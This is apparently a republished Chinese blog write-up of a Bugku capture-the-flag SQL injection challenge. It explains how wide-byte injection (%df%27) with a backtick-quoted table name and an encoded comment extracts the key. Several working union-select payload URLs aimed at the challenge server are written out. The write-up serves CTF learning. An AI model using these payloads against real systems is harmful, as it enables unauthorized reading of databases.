sql注入——bugku

Posted lxz-1263030049

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sql注入——bugku相关的知识,希望对你有一定的参考价值。

刚刚做了bugku的题目,现在整理一下

写出解题思路,希望能够帮助到那些需要帮助的人

所有的wp都是以一题一篇的形式写出

主要是为了能够让读者更好的阅读以及查找,

希望你们不要责怪!!共勉!!!

永远爱你们的————新宝宝

 

sql注入

50

 

http://103.238.227.13:10083/

格式KEY{}

 技术分享图片

解题思路:这一题涉及的知识点比较多(有可能我太菜了吧QAQ)

打开链接就会得到:

技术分享图片

很明显可以看出查询key表,id=1的string字段

我们去构造payload:

103.238.227.13:10083/?id=2 union select 1,string from key#

就会得到:

技术分享图片

我们什么都没有发现呀,还是需要重新开始看一下是什么注入:

技术分享图片

发现id=1和id=1’窦娥米有出现问题,这个时候我们就可以想到是宽字节注入,试一下

技术分享图片

果然是的,有关于宽字节注入的信息可以看这里:https://www.cnblogs.com/lxz-1263030049/p/9297935.html

那么我们就可以构造一下payload:

103.238.227.13:10083/?id=1%df%27 union select 1,string from key#

技术分享图片

我们试一下另一种引号方式

103.238.227.13:10083/?id=1%df%27 union select 1,string from `key`#

 

这种引号是在tab键的上方:

技术分享图片

还是报错不过错误的位置换了一下

我们把#键换为%23就会得到:

103.238.227.13:10083/?id=1%df%27 union select 1,string from `key`%23

就会得到:

技术分享图片

注意最后的格式哦!!!

 

您可以考虑给博主来个小小的打赏以资鼓励,您的肯定将是我最大的动力

                        微信打赏                                                                                                                                 支付宝打赏

技术分享图片                                                                                    技术分享图片

 

 

如果有什么不明白的地方,留言或者加我!!! 
我很菜,所以我会努力的! 
努力是因为不想让在乎的人失望! 
博主整理不易,如果喜欢推荐关注一下博主哦!

博主喜欢广交好友下面是我的联系方式: 
QQ:1263030049 
加好友前请注明原因谢谢!

以上是关于sql注入——bugku的主要内容,如果未能解决你的问题,请参考以下文章

以下代码片段是不是容易受到 Rails 5 中 SQL 注入的影响?

bugku web2

BugKu:blind-injection 盲注

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段

bugku_web_多次

BugKu CTF web25解题思路笔记